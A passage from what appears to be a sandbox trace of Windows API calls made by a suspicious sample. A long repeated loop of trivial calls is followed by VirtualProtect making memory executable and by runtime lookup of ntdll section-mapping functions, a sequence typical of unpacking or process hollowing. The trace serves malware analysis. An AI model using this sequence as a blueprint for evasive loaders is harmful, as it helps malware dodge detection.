(hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.177] GetKeyState (nVirtKey=1) returned 0 [0032.177] GetStretchBltMode (hdc=0x1) returned 0 [0032.177] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.178] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.178] GetKeyState (nVirtKey=1) returned 0 [0032.178] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.179] GetStretchBltMode (hdc=0x1) returned 0 [0032.179] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.179] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.180] GetKeyState (nVirtKey=1) returned 0 [0032.180] GetStretchBltMode (hdc=0x1) returned 0 [0032.180] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.181] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.181] GetKeyState (nVirtKey=1) returned 0 [0032.181] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.182] GetStretchBltMode (hdc=0x1) returned 0 [0032.182] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.182] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.183] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.183] GetKeyState (nVirtKey=1) returned 0 [0032.183] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.184] GetKeyState (nVirtKey=1) returned 0 [0032.184] GetStretchBltMode (hdc=0x1) returned 0 [0032.184] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.185] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.185] GetKeyState (nVirtKey=1) returned 0 [0032.185] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.186] GetStretchBltMode (hdc=0x1) returned 0 [0032.186] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.186] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.187] GetStretchBltMode (hdc=0x1) returned 0 [0032.187] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.187] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.188] GetKeyState (nVirtKey=1) returned 0 [0032.188] GetStretchBltMode (hdc=0x1) returned 0 [0032.188] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.189] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.189] GetKeyState (nVirtKey=1) returned 0 [0032.189] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.190] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.190] GetKeyState (nVirtKey=1) returned 0 [0032.190] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.191] GetStretchBltMode (hdc=0x1) returned 0 [0032.191] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.191] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.192] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.192] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.192] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.192] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.192] GetKeyState (nVirtKey=1) returned 0 [0032.192] GetStretchBltMode (hdc=0x1) returned 0 [0032.192] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.198] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0032.201] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0032.201] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0032.202] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0032.203] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0032.203] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0032.203] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0032.203] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0032.203] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0032.203] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0032.204] 